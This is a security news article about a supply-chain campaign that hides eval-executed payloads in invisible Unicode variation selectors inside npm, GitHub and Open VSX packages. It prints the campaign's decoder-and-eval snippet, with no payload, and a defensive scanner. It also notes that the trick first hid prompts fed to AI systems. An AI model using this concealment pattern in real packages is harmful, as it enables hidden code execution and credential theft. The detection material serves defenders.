Supply-chain attack uses invisible Unicode code to bypass detection

✍️ OpenClawRadar 📅 Published: March 15, 2026 🔗 Source

Security researchers from Aikido Security discovered a supply-chain attack using invisible Unicode code to conceal malicious functions in packages uploaded to GitHub, NPM, and Open VSX. The attack group, dubbed Glassworm, uploaded 151 malicious packages to GitHub from March 3 to March 9, 2026.

How the invisible code works

The malicious packages use Unicode characters from Public Use Areas (also called Public Use Access) that are invisible when viewed in editors, terminals, and code review interfaces. While most of the code appears normal, malicious functions and payloads are rendered using these invisible characters, making manual code reviews and traditional defenses ineffective.

To a computer, the invisible Unicode characters stand for ordinary letters of the alphabet; to a human reader they display as whitespace or blank lines. A JavaScript interpreter reads and executes these characters as normal code.

Technical implementation

In one analyzed package, attackers encoded a malicious payload using invisible characters. The code includes a decoder function that extracts the hidden bytes and passes them to eval():

// Decoder: maps each variation selector code point to a byte value.
// U+FE00..U+FE0F -> 0..15, U+E0100..U+E01EF -> 16..255; any other
// character yields null and is dropped by the filter.
const s = v => [...v].map(
  w => (
    w = w.codePointAt(0),
    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
    null
  )
).filter(n => n !== null);
// The template literal looks empty but holds the invisible selectors;
// the decoded bytes are treated as UTF-8 source text and executed.
eval(Buffer.from(s(``)).toString('utf-8'));

The backtick string passed to s() appears empty in viewers but contains invisible characters that decode to a full malicious payload. In previous incidents, decoded payloads fetched and executed second-stage scripts using Solana as a delivery channel to steal tokens, credentials, and secrets.
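As an added example for defenders (not code from the article or from Aikido), the scanner below walks JavaScript source for runs of the same variation-selector code points the decoder above consumes (U+FE00–U+FE0F and U+E0100–U+E01EF) and reports each run's position and decoded bytes without executing anything. The sample input and the function names are my own constructions.

```javascript
'use strict';

// Code points the article's decoder maps to byte values: VS1-VS16 and VS17-VS256.
const isVariationSelector = (cp) =>
  (cp >= 0xFE00 && cp <= 0xFE0F) || (cp >= 0xE0100 && cp <= 0xE01EF);

// Same mapping as the package's decoder, used here only so an analyst can
// see what a run hides without running it through eval().
const decodeRun = (cps) => Buffer.from(cps.map(cp =>
  cp <= 0xFE0F ? cp - 0xFE00 : cp - 0xE0100 + 16)).toString('utf-8');

// Scan source text and return one finding per run of variation selectors.
// Caveat: a single selector after a non-ASCII base character (emoji + U+FE0F)
// is normal text, so only runs of length >= 2, or selectors glued to ASCII
// (such as a backtick), are flagged.
function findHiddenRuns(source) {
  const findings = [];
  source.split('\n').forEach((line, lineIdx) => {
    const chars = [...line];            // iterate by code point, not UTF-16 unit
    let i = 0;
    while (i < chars.length) {
      if (!isVariationSelector(chars[i].codePointAt(0))) { i++; continue; }
      let j = i;
      while (j < chars.length && isVariationSelector(chars[j].codePointAt(0))) j++;
      const prev = i > 0 ? chars[i - 1].codePointAt(0) : null;
      const suspicious = (j - i) >= 2 || prev === null || prev < 0x80;
      if (suspicious) {
        const cps = chars.slice(i, j).map(c => c.codePointAt(0));
        findings.push({
          line: lineIdx + 1,
          column: i + 1,                // 1-based, counted in code points
          length: j - i,
          nearEval: /\beval\s*\(|new\s+Function\s*\(/.test(line),
          decoded: decodeRun(cps),
        });
      }
      i = j;
    }
  });
  return findings;
}

// Constructed sample: a harmless emoji line, then a backtick literal that looks
// empty but carries U+E015F U+E015B, which the decoder turns into the bytes "ok".
const SAMPLE = [
  "const banner = 'deploy \u2764\uFE0F done';",
  "eval(Buffer.from(s(`\u{E015F}\u{E015B}`)).toString('utf-8'));",
].join('\n');

for (const f of findHiddenRuns(SAMPLE)) console.log(JSON.stringify(f));
```

The emoji line produces no finding; the second line is reported with its decoded content and the eval() flag, which is the signal to route the package for manual triage.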


Attack characteristics

The malicious packages are particularly difficult to detect because:

  • The visible portions of the code are high quality and realistic
  • Surrounding changes include documentation tweaks, version bumps, small refactors, and bug fixes
  • Changes are stylistically consistent with target projects
  • Researchers suspect LLMs are used to generate convincingly legitimate packages

This Unicode technique was first used in 2024 to conceal malicious prompts fed to AI engines, and has since been adapted for traditional malware attacks. The 151 packages detected likely represent a small fraction of the campaign, as many have been deleted since initial upload.

📖 Read the full source: HN AI Agents
